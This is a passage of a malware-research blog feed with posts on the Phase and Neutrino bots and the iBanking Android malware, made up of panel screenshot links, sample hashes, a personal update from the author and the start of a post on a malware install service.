src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIlg_7I3yofdUsq4Wns375SzwW3DDtMzj4rAf-IKn8R07GUBfuZukJDM1H4JWa5eKE7_HkgIGgIGfS5TscfrTZi0Tz4q6jO3ZwLr13O162nzH_3Gz3WHVwtRZ_Cg7wuB7qN3KhMhVmcZA/s1600/2014-12-15_10-07-20.png" height="296" width="400" /></a></div> <br /> Wallet stealer:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4tFdUGWsHRl-gj29E4oFwteq-SdJVzjn9mwr1nHC_R8_sDSShyXCUuJDTcCsgAf15tdo0Qo0qDv2ZY4PpfVdjCOJUOvJEzo4_Hnjav9f6U22cKuQGJW02vgUCJPr_9cHO0OyetdREbe8/s1600/2014-12-17_02-42-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4tFdUGWsHRl-gj29E4oFwteq-SdJVzjn9mwr1nHC_R8_sDSShyXCUuJDTcCsgAf15tdo0Qo0qDv2ZY4PpfVdjCOJUOvJEzo4_Hnjav9f6U22cKuQGJW02vgUCJPr_9cHO0OyetdREbe8/s1600/2014-12-17_02-42-38.png" height="222" width="400" /></a></div> <br /> Phase samples:<br /> ae7a56b3adf6f7684ba14a77c017904d<br /> 12dccdec47928e5298055996415a94f2<br /> d1446326bf1c69ea9df6e65bd472f358<br /> 1f3e808a3ccd981f3e61de227dae93b8<br /> 6ce0bb4cd86295f915160d7207a07a47<br /> 5767b9bf9cb6f2b5259f29dd8b873e36<br /> a10f84153dba7b73980f0ff50d8cc8e6<br /> f8ffcab3324561598ce5c375c07066be<br /> e4574fbc1014d27e1b6906bfc5351e0e<br /> d2ed20b1996e7e5bad2b91fd255732ef<br /> f89b4e626c7a81544ca7395be3262cf6<br /> ef69575e14fa965380242db26675d2df<br /> fc586c3ec37e51668e905d0acfc913f6<br /> eb9b56d829c3951b6e9cb5e4a651f7c8 <br /> 6f53d3cd1acb7541bcc7399c4af001b1<br /> 19fa3927577571c51428f6eee2b5f52f <br /> 4ec84f1aa91e4cdc12118002244ca582<br /> 20e3a9ec396ad8b57a36ea3c6b9f151a<br /> fe5dfa53204a65eca741ceab352c3b00<br /> ace0a059dc2264c847d4e6c91f829dfd <br /> f01c1ea73e968c2309391dcf3f0a2848<br /> <br /> Unencrypted Ram scrapper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8<br /> Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0<br /> Panel: c43933e7c8b9d4c95703f798b515b384 (With a small trendMicro signature fail "PHP_SORAYA.A" no this is not the Soraya panel.<br /> Needless to say the panel was also <a href="http://www.malwaretech.com/2014/12/phase-bot-exploiting-c-panel.html">vulnerable</a>. https://www.xylibox.com/2015/01/phase-win32phasebot-a.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-304183291808741055Mon, 12 Jan 2015 20:48:00 +00002015-01-12T21:49:04.565+01:00Neutrino botNeutrino bot is a malware who appeared and vanished quickly like <a href="http://www.xylibox.com/2015/01/phase-win32phasebot-a.html">Phase</a>.<br /> not worth the look anyway. <br /> <br /> Advert:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEU_4r8zqbFksVyFYmD7ns3oUlcYz3LmdVEEUVYIlYABcqJxL0srOKu7SWplTyqFeMOEVahLkSBNczWLTNzL8nFpdHsUI5MG2ieAvmpbBgPL9r6DeottgaOB2Kf9TAm83qfdRYMT4jPiQ/s1600/2014-05-31_13-27-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEU_4r8zqbFksVyFYmD7ns3oUlcYz3LmdVEEUVYIlYABcqJxL0srOKu7SWplTyqFeMOEVahLkSBNczWLTNzL8nFpdHsUI5MG2ieAvmpbBgPL9r6DeottgaOB2Kf9TAm83qfdRYMT4jPiQ/s1600/2014-05-31_13-27-32.png" height="640" width="476" /></a></div> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh77yf7PxH_6hUEJOp-5pxbz2IAwQGKZ5DPwrzrLnrlEPtasnphcIMmUXRLSHToLJgNQQ8rJF2Bpr1Y-gTO6YWBMCKpzveHIeDjiYZAExLBBgBjoYTlr6nxMSyN6vibMTXT1TEetiAFUy4/s1600/2014-05-31_13-04-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh77yf7PxH_6hUEJOp-5pxbz2IAwQGKZ5DPwrzrLnrlEPtasnphcIMmUXRLSHToLJgNQQ8rJF2Bpr1Y-gTO6YWBMCKpzveHIeDjiYZAExLBBgBjoYTlr6nxMSyN6vibMTXT1TEetiAFUy4/s1600/2014-05-31_13-04-18.png" height="200" width="400" /></a></div> <br /> Task:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-tUUVlWkFAI7SwSqdKcaoqIFuyE-kccNT3GVNtTNxuES_8bxztAqskPjFbi5rlsaB-u5sdjdr9jBFvTC_csASTxiDG2EeTtm4FSo_IFIFvxLAVhA-ONlt-LV775o0o6C2LZN3ZH430o/s1600/2014-05-31_13-05-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-tUUVlWkFAI7SwSqdKcaoqIFuyE-kccNT3GVNtTNxuES_8bxztAqskPjFbi5rlsaB-u5sdjdr9jBFvTC_csASTxiDG2EeTtm4FSo_IFIFvxLAVhA-ONlt-LV775o0o6C2LZN3ZH430o/s1600/2014-05-31_13-05-49.png" height="222" width="400" /></a></div> <br /> Statistics:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJOnO8LEl8W5mWFIDsPgV190oZsCWXRPhqlFH2u5hJX87NKHJEuDQY6fEFgOL3lXnF9eDvqfyxHrjlIgXWM2tvb5xnwSPUjsclcTz4kuv8Wghboxl_7bzoIamc4HGlG5N9Z0eDMu2K-5E/s1600/2014-05-31_13-09-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJOnO8LEl8W5mWFIDsPgV190oZsCWXRPhqlFH2u5hJX87NKHJEuDQY6fEFgOL3lXnF9eDvqfyxHrjlIgXWM2tvb5xnwSPUjsclcTz4kuv8Wghboxl_7bzoIamc4HGlG5N9Z0eDMu2K-5E/s1600/2014-05-31_13-09-26.png" height="640" width="404" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Clients:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXndBlKUBBHylQDlTjVpHxZU-HkybWuZUs-7kRyJOW85RXXWc5td2u8m9p-oSk9cIrKXYlDf_JbBeIHGRaDd2bFHdljIyd79rpWU00S_wVdx0Z6pF0qHfDfEPtMBtdOkavodvUx_CXVM/s1600/2014-05-31_13-10-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXndBlKUBBHylQDlTjVpHxZU-HkybWuZUs-7kRyJOW85RXXWc5td2u8m9p-oSk9cIrKXYlDf_JbBeIHGRaDd2bFHdljIyd79rpWU00S_wVdx0Z6pF0qHfDfEPtMBtdOkavodvUx_CXVM/s1600/2014-05-31_13-10-48.png" height="262" width="400" /></a></div> <br /> Files:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpVzdWGCtYKPVaXpry1QnTHOWCPUtnlQUWufJLsgBOcqCUcqFEtXIDB7OpQvBOCujiswvBCiogWGyeB8ApPU1KAdZ8tXAjzhBViUr9ln5qm2tpAvDz24TRPwNtlFUEKhyphenhyphencc6ksaJgXGs/s1600/2014-05-31_13-12-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggpVzdWGCtYKPVaXpry1QnTHOWCPUtnlQUWufJLsgBOcqCUcqFEtXIDB7OpQvBOCujiswvBCiogWGyeB8ApPU1KAdZ8tXAjzhBViUr9ln5qm2tpAvDz24TRPwNtlFUEKhyphenhyphencc6ksaJgXGs/s1600/2014-05-31_13-12-35.png" height="230" width="400" /></a></div> <br /> Logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTo9YnI0J-cAcSJcioQ_tCTuNbMXgrYc2AedCMX_mhJ1qefgCLLLHPZfu2v9lwE6x0GYvpWuXfvP9ghzvhP93FGjlkrfBlONdWRl2B-jiwGwgOmatnJkuMYb_lMjwB1Gmzm22qIMBieSQ/s1600/2014-05-31_13-12-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTo9YnI0J-cAcSJcioQ_tCTuNbMXgrYc2AedCMX_mhJ1qefgCLLLHPZfu2v9lwE6x0GYvpWuXfvP9ghzvhP93FGjlkrfBlONdWRl2B-jiwGwgOmatnJkuMYb_lMjwB1Gmzm22qIMBieSQ/s1600/2014-05-31_13-12-26.png" height="230" width="400" /></a></div> <br /> Settings:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGacmymqyEtXo258EHHmI096wMv_goQGcWj9iqbfFbcLxRtyclX4DE2fkOus-qJ0RN3ZnJJ4Hzvm-Cnq-JyN_Jk1peAboBL5XM694DX3x4hO_dDtZ7ET3TmEwKae93MgMFlgXxJwfR6vw/s1600/2014-05-31_13-12-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGacmymqyEtXo258EHHmI096wMv_goQGcWj9iqbfFbcLxRtyclX4DE2fkOus-qJ0RN3ZnJJ4Hzvm-Cnq-JyN_Jk1peAboBL5XM694DX3x4hO_dDtZ7ET3TmEwKae93MgMFlgXxJwfR6vw/s1600/2014-05-31_13-12-20.png" height="230" width="400" /></a></div> https://www.xylibox.com/2015/01/neutrino-bot.htmlnoreply@blogger.com (Steven K)5tag:blogger.com,1999:blog-5365964245877416061.post-5065446507325469524Mon, 12 Jan 2015 20:47:00 +00002015-01-12T21:47:32.559+01:00iBankingiBanking is an android malware made to intercept voice and text informations.<br /> The panel is poorly coded.<br /> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBAKvKawYlJBMh1iz3TbojA4_d009Iiumu0m5mQF8UHt5daBK_BRsYMcnDR9rQDFXdWoFF0CIhGTUSDYDN777h1hm-lA2PymHK2_HJf2bSV33a1_9oaFiaT5Bg3Up9rGMJjLbEf021qO8/s1600/16-02-2014+20-36-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBAKvKawYlJBMh1iz3TbojA4_d009Iiumu0m5mQF8UHt5daBK_BRsYMcnDR9rQDFXdWoFF0CIhGTUSDYDN777h1hm-lA2PymHK2_HJf2bSV33a1_9oaFiaT5Bg3Up9rGMJjLbEf021qO8/s1600/16-02-2014+20-36-52.png" height="297" width="400" /></a></div> <br /> Projects:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2rWaDzswTQUSa5zsjTFLFewVmfO1Eg1UBdDaTxXxThO3CW-WnVo_y6XBSr1dOlRwKWHwGBRFY-ShuPlc3gTuh2TReJzsLlxiXIHDJeAnuR2OKGSkojyEgL43Bn88qztTaLyPBi-rw2Fg/s1600/16-02-2014+20-38-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2rWaDzswTQUSa5zsjTFLFewVmfO1Eg1UBdDaTxXxThO3CW-WnVo_y6XBSr1dOlRwKWHwGBRFY-ShuPlc3gTuh2TReJzsLlxiXIHDJeAnuR2OKGSkojyEgL43Bn88qztTaLyPBi-rw2Fg/s1600/16-02-2014+20-38-16.png" height="140" width="400" /></a></div> <br /> Phone list:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9b4X2XCO3cDspOgyeXAGRkoPlNVAwhfAdQwaRFM1APH_xW1Vb06hzEVZROqhyphenhyphenAMMDr9877uNaWfhqqFBqeGck69Dua2KUKOwQaBOt0TfZttWiDFHow4NrbkUF-FkniuzNlJwFcUp5OSE/s1600/16-02-2014+20-39-50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9b4X2XCO3cDspOgyeXAGRkoPlNVAwhfAdQwaRFM1APH_xW1Vb06hzEVZROqhyphenhyphenAMMDr9877uNaWfhqqFBqeGck69Dua2KUKOwQaBOt0TfZttWiDFHow4NrbkUF-FkniuzNlJwFcUp5OSE/s1600/16-02-2014+20-39-50.png" height="252" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7wEyRKPwYJL5FEC3EbhXY2JsmDIIu1qxrDHWis6NoPFoakwQQ7ya4-JLp8EWkERs3L9KlPkdVth3qz0Lh7oHTiHK3SZZCLpQEtwf-ngBTnt45Aylk3dnVMl_0TSYfngPOjLxlSRgfzM/s1600/16-02-2014+21-01-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-7wEyRKPwYJL5FEC3EbhXY2JsmDIIu1qxrDHWis6NoPFoakwQQ7ya4-JLp8EWkERs3L9KlPkdVth3qz0Lh7oHTiHK3SZZCLpQEtwf-ngBTnt45Aylk3dnVMl_0TSYfngPOjLxlSRgfzM/s1600/16-02-2014+21-01-58.png" /></a></div> <br /> SMS List:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmLv7jlFQ81veLZu1TffWWe_YWtcZfUQN4MetOf_wx9M8JHFoeQ61JHrdkJb9SkEhqLpmYd31a806RK9Agj1V3yx6Qukk9Rjynm9IWgRQN2SOBbTHf9SBMjwVWGyZ_BiIg1rqv_003QYk/s1600/16-02-2014+21-03-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmLv7jlFQ81veLZu1TffWWe_YWtcZfUQN4MetOf_wx9M8JHFoeQ61JHrdkJb9SkEhqLpmYd31a806RK9Agj1V3yx6Qukk9Rjynm9IWgRQN2SOBbTHf9SBMjwVWGyZ_BiIg1rqv_003QYk/s1600/16-02-2014+21-03-05.png" height="190" width="400" /></a></div> <br /> All SMS (Incomming)<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmAX4rd9Yz4AqUM74A8rU3RC9gMwDaMAE1suWGeELJlpdZPhPyvfUy8x89rdf0d7vMgwI2OHlqwwjGK8FLLJZuCR42hy_FE0SK2Yl6CAKeovmIT9Ej1WjOEPD0NjOmccVWs7ZlrUmi30/s1600/16-02-2014+21-35-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmAX4rd9Yz4AqUM74A8rU3RC9gMwDaMAE1suWGeELJlpdZPhPyvfUy8x89rdf0d7vMgwI2OHlqwwjGK8FLLJZuCR42hy_FE0SK2Yl6CAKeovmIT9Ej1WjOEPD0NjOmccVWs7ZlrUmi30/s1600/16-02-2014+21-35-30.png" height="178" width="400" /></a></div> <br /> All SMS (Outgoing):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixZJUJTNkC6_U3WEXZ-RiIwoqAsiPCMuJXU6hgQjKYCzpdIOuBAq5kZ4VRZKYiwYOH7kaCfv60XSovIIOeu2xdHEgTD8TRvBCNyA84RwZv1c4Fxm6KX9aiMzNucAM54Bu9U1UdhKnz0vg/s1600/16-02-2014+21-10-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixZJUJTNkC6_U3WEXZ-RiIwoqAsiPCMuJXU6hgQjKYCzpdIOuBAq5kZ4VRZKYiwYOH7kaCfv60XSovIIOeu2xdHEgTD8TRvBCNyA84RwZv1c4Fxm6KX9aiMzNucAM54Bu9U1UdhKnz0vg/s1600/16-02-2014+21-10-45.png" height="190" width="400" /></a></div> <br /> Call list (Incomming):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9V5rgiso6XDSpcHoZyEJuOrMfOzOn7kvKws0ITCCUOR5SSAzva8NT79SlfWAOsTGaZetNjqrdNSVfQHZrlsofS8Yl5vRL4oosEI-mZwNzj5oQgDisu80MLltHiDekGdA71DZx5vHNiXg/s1600/16-02-2014+21-14-48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9V5rgiso6XDSpcHoZyEJuOrMfOzOn7kvKws0ITCCUOR5SSAzva8NT79SlfWAOsTGaZetNjqrdNSVfQHZrlsofS8Yl5vRL4oosEI-mZwNzj5oQgDisu80MLltHiDekGdA71DZx5vHNiXg/s1600/16-02-2014+21-14-48.png" height="190" width="400" /></a></div> <br /> Call list (Outgoing):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnkuRXmjjoGSP-lZBRLuKxFcE1rqA1s41FnV27MRpCt94z44Zv4Qn4sB2u1fu_zYAeYUA-Yg7Ed8SIkhyphenhyphenJmWd5fNlt4ovoQ0nw6hPcgtbn756CfqLJrRIjLyO1OUtuL3DNUPmQZLTmdQI/s1600/16-02-2014+21-18-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnkuRXmjjoGSP-lZBRLuKxFcE1rqA1s41FnV27MRpCt94z44Zv4Qn4sB2u1fu_zYAeYUA-Yg7Ed8SIkhyphenhyphenJmWd5fNlt4ovoQ0nw6hPcgtbn756CfqLJrRIjLyO1OUtuL3DNUPmQZLTmdQI/s1600/16-02-2014+21-18-52.png" height="190" width="400" /></a></div> <br /> Call list (Missed):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ts0_hsGMiTv2UVv1p6qpQN_A2vR5PgzTOu7Fp8BCZy85kvxVGehgpaawMH7xjJxS7RfG8-iea5lKt7b2sykOyOlAREDAiMv0sfIDaFCFJ9f4A1xqHH9mA-jOap8WAxo8HzpdcpiV6F8/s1600/16-02-2014+21-22-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Ts0_hsGMiTv2UVv1p6qpQN_A2vR5PgzTOu7Fp8BCZy85kvxVGehgpaawMH7xjJxS7RfG8-iea5lKt7b2sykOyOlAREDAiMv0sfIDaFCFJ9f4A1xqHH9mA-jOap8WAxo8HzpdcpiV6F8/s1600/16-02-2014+21-22-37.png" height="190" width="400" /></a></div> <br /> Sounds:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLEygkvK2YfbrWObtJ8X_9k7iqUAcv47ni-BArWD0lBWuzUsxKTgi9792TM8yhaytPwWgNsTOkoEc4ZWYn107Dt6UgMsJxTrKrIF4MMQj9nU7PuGLE_zpo8lKUvSo00EapqhWiOsex-34/s1600/16-02-2014+21-26-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLEygkvK2YfbrWObtJ8X_9k7iqUAcv47ni-BArWD0lBWuzUsxKTgi9792TM8yhaytPwWgNsTOkoEc4ZWYn107Dt6UgMsJxTrKrIF4MMQj9nU7PuGLE_zpo8lKUvSo00EapqhWiOsex-34/s1600/16-02-2014+21-26-36.png" height="83" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> </div> Contact list:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt-IKHN6kHudlPQdvShhyphenhyphenbYyb8zzVEa3siZeEId2o0dAh3G2D8rAbDr4awtx31tGgcokG2Uq3KuBw6XtBuh41mnc-WytbByeYAckNet95p_itFK0WDWf_KF4M1k42eLbSivq22Sx63Xd0/s1600/16-02-2014+21-27-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt-IKHN6kHudlPQdvShhyphenhyphenbYyb8zzVEa3siZeEId2o0dAh3G2D8rAbDr4awtx31tGgcokG2Uq3KuBw6XtBuh41mnc-WytbByeYAckNet95p_itFK0WDWf_KF4M1k42eLbSivq22Sx63Xd0/s1600/16-02-2014+21-27-25.png" height="235" width="400" /></a></div> <br /> Url report:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz60_-IQeMblEs9Q03oK_FJWV6ayBErO3OwGI0Yd-2xTR7J6XM2aS5CBDLEscAEkWDrozuiEzh-3EMnqLRtOquccGOma7JgifmssudaV1Be8qVZg4unOqUb0MaEy-AspTszfjC32Bvek4/s1600/16-02-2014+21-33-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz60_-IQeMblEs9Q03oK_FJWV6ayBErO3OwGI0Yd-2xTR7J6XM2aS5CBDLEscAEkWDrozuiEzh-3EMnqLRtOquccGOma7JgifmssudaV1Be8qVZg4unOqUb0MaEy-AspTszfjC32Bvek4/s1600/16-02-2014+21-33-13.png" height="92" width="400" /></a></div> https://www.xylibox.com/2015/01/ibanking.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-3256959065928710311Sat, 20 Dec 2014 17:45:00 +00002014-12-20T18:45:27.908+01:00blog newshappy new yearlife & shitXyliboxWow, it's been a awhile since i haven't written anything new here...<br />So to answer many questions.. no i'm not dead, and will try to get active again a bit next year.<br /> <br />I'm not writing this due to explanation requests or people worried (even if i got solicited many time to write something) but more because i'm motivated again to write.<br /> As i've said many times to the recurrent e-mails i receive and continue to receive (even after 7 months of inactivity!)<br /> I've did a lot of changement in my life, and during this time i got better things to do than writing in a blog.<br /> Principaly i had many personal issues to resolve. <br /> It's also not the first time i repeat that i've a life and that i've always run this blog for fun and nonprofit like my other services such as <a href="http://cybercrime-tracker.net/">cybercrime-tracker.net</a><br /> And sooner or later i will get bored and do a break although i've continued to update CCT, to don't leave people with nothing.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKgmbK7f8u4y7cQ80C_fe3pm3CcHFCDT0rMXTAU8f_aTxVLFDKWK_Sdy4C1prG8XgBJYw51pgGDKm-VRTVD4u0zw3k8nACdQp74MeGPQnZzYPY6nyBOU4ZWT1iqb-tABYIeZ-uP1NjYEE/s1600/2014-12-20_16-39-17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKgmbK7f8u4y7cQ80C_fe3pm3CcHFCDT0rMXTAU8f_aTxVLFDKWK_Sdy4C1prG8XgBJYw51pgGDKm-VRTVD4u0zw3k8nACdQp74MeGPQnZzYPY6nyBOU4ZWT1iqb-tABYIeZ-uP1NjYEE/s1600/2014-12-20_16-39-17.png" height="320" width="320" /></a></div> <br /> I changed of job also and shifted in the energy sector.<br /> I wanted to get a job who combine my passion for mechanic and electronic.<br /> And now i'm winding turbo-alternators for nuclear/hydraulic power plants around the world and governmental organisations. (pretty cool, huh?)<br /> I can't tell you details obviously due to confidentiality clauses as it's critical, but making those huge machines/projects are quite awesome and the job is very meticulous.<br /> <br /> I've joined also the administration of my local <a href="http://hackaday.io/hackerspace/1374-hackgyver">hackerspace</a>, and now holds the position of treasurer.<br />I'm doing also various workshops mostly electronic/borderline related who take me time to prepare and organize.<br /> In parallel i experiment myself also a lot, those who follow my youtube/twitter activity probably know what i mean, i received 2 day ago hydrofluoric acid.<br /><br /> 2014 started a bit bad for me as i had a car crash the day of christmas and got the clavicle broken. Anyway globally it was a nice year, and off my blog i've met a lot of people like Horgh and many others.<br /> Sadly i wasn't able to go to BotConf neither DahuCon this year due to my job... so maybe next year !<br /> <br /> I've worked a bit also with <a href="http://hackerstrip.com/">Hackerstrip</a> and released recently some codes for <a href="http://vxheaven.org/vx.php?id=zd12&amp;lang=en&amp;fid=2017#f2017">DarK-CodeZ #6</a>, nothing fancy but it was fun to participate, thanks guys.<br /> So that all, see you in 2015 for throwing cobblestones and breaking bones !https://www.xylibox.com/2014/12/io.htmlnoreply@blogger.com (Steven K)7tag:blogger.com,1999:blog-5365964245877416061.post-8817311472227855523Mon, 05 May 2014 11:16:00 +00002014-05-05T17:59:16.912+02:00fakeavFeodalCashLoader servicemalware affiliateMalwoxMayachokRansomwarerussian lockerSeveraSpamSpambotSpyEyewinlockZeuSThis install service was running since a long time but the server recently died.<br /> People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.<br /> <br /> Login:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsgtqpgKKmpIg7FWkHDSbUwOt6vPw3wDSyPwdIgww6WiQjJ-RK3I1POvAR9sqd06uBvY8DDJwNq_PlZtiN3irm2Kdxsb9RmXYX6y5CzmyxS4uLo0yxzwCfnnh9pKJE6gct5Ej_jWwqC4/s1600/15-07-2013+14-28-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsgtqpgKKmpIg7FWkHDSbUwOt6vPw3wDSyPwdIgww6WiQjJ-RK3I1POvAR9sqd06uBvY8DDJwNq_PlZtiN3irm2Kdxsb9RmXYX6y5CzmyxS4uLo0yxzwCfnnh9pKJE6gct5Ej_jWwqC4/s400/15-07-2013+14-28-03.png" height="400" width="325" /></a></div> <br /> Statistics by days:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO0FW9sq8p8KIRuGcA5e_e5xulHJrXXvvOfKLAubOI0eYZ1k4Cb3gPN0KnWI6FbkX9EU75l_9NBRRkemPNSQYoQB03rKzllgiEkFanA2_SnMRTkPVjSZGjlA8U3wMBNfcpi0BwQrjcawg/s1600/15-07-2013+14-29-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO0FW9sq8p8KIRuGcA5e_e5xulHJrXXvvOfKLAubOI0eYZ1k4Cb3gPN0KnWI6FbkX9EU75l_9NBRRkemPNSQYoQB03rKzllgiEkFanA2_SnMRTkPVjSZGjlA8U3wMBNfcpi0BwQrjcawg/s400/15-07-2013+14-29-41.png" height="206" width="400" /></a></div> (Date, Unique visits, General visits)<br /> <br /> Statistics by countries:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHtOjwDTTUc05U8Z3FetucQ0-nlmAYbqUpEgB6dOAsqEISGBWO4mJ8lSFhxjizgA-OvDcEQwDrW8bWBO_s-u6fMFAi1aHPDDhw3tgSzeZxeN6S_H4wp6Usfun-O0CtylWWRwUX-V_KsNg/s1600/15-07-2013+14-42-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHtOjwDTTUc05U8Z3FetucQ0-nlmAYbqUpEgB6dOAsqEISGBWO4mJ8lSFhxjizgA-OvDcEQwDrW8bWBO_s-u6fMFAi1aHPDDhw3tgSzeZxeN6S_H4wp6Usfun-O0CtylWWRwUX-V_KsNg/s400/15-07-2013+14-42-34.png" height="145" width="400" /></a></div> (Countries, Unique visits, Percentage, General visits)<br /> <br /> Statistics by version:<br /> <div class="separator" style="clear: both; text-align: center;"> <a 